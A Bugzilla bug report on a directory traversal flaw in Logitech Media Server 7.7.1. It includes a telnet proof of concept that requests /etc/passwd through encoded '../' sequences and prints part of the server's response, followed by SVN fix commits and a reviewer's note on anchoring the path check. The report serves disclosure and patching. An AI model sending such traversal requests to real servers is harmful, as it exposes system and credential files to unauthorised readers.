Bugzilla – Bug 17841
directory traversal vulnerability
Last modified: 2012-02-14 21:38:58 UTC
The logitech media server exposes a directory traversal vulnerability. Tested with CentOS release 5.7 2.6.18-274.12.1.el5 and debian 6.0.3 (squeeze) original find by kotekote, forum thread http://forums.slimdevices.com/showthread.php?t=92591 $ telnet localhost 9000 Trying 127.0.0.1... Connected to localhost.localdomain (127.0.0.1). Escape character is '^]'. GET /html/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.0 HTTP/1.1 200 OK Server: Logitech Media Server (7.7.1 - 33735) Cache-Control: max-age=604800 Connection: close Date: Fri, 16 Dec 2011 01:54:53 GMT Content-Length: 2741 Content-Type: text/html; charset=utf-8 Expires: Fri, 23 Dec 2011 01:54:53 GMT X-Time-To-Serve: 2.26416206359863 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin ...
*** This bug has been confirmed by popular vote. ***
== Auto-comment from SVN commit #33835 to the slim repo by mherger == == http://svn.slimdevices.com/slim?view=revision&revision=33835 == Fixed Bug: 17841 Description: don't allow directory traversal outside the HTML base folder
My perl is really rusty, but i thought about two things http://svn.slimdevices.com/slim/7.7/trunk/server/Slim/Web/Template/NoWeb.pm?view=markup&pathrev=33835 shouldn't line 182 anchor the pattern at the front of the $found? I'm not up to date with unicode in perl. But i would leave out the regexp match in line 176 just to be sure.
== Auto-comment from SVN commit #33838 to the slim repo by mherger == == http://svn.slimdevices.com/slim?view=revision&revision=33838 == Bug: 17841 Description: match the base path at the start of the requested URL.
> shouldn't line 182 anchor the pattern at the front of the $found? Good catch - thanks! > I'm not up to date with unicode in perl. But i would leave out the regexp match > in line 176 just to be sure. Should be fine the way it is. We don't want to add the performance hit on all URLs.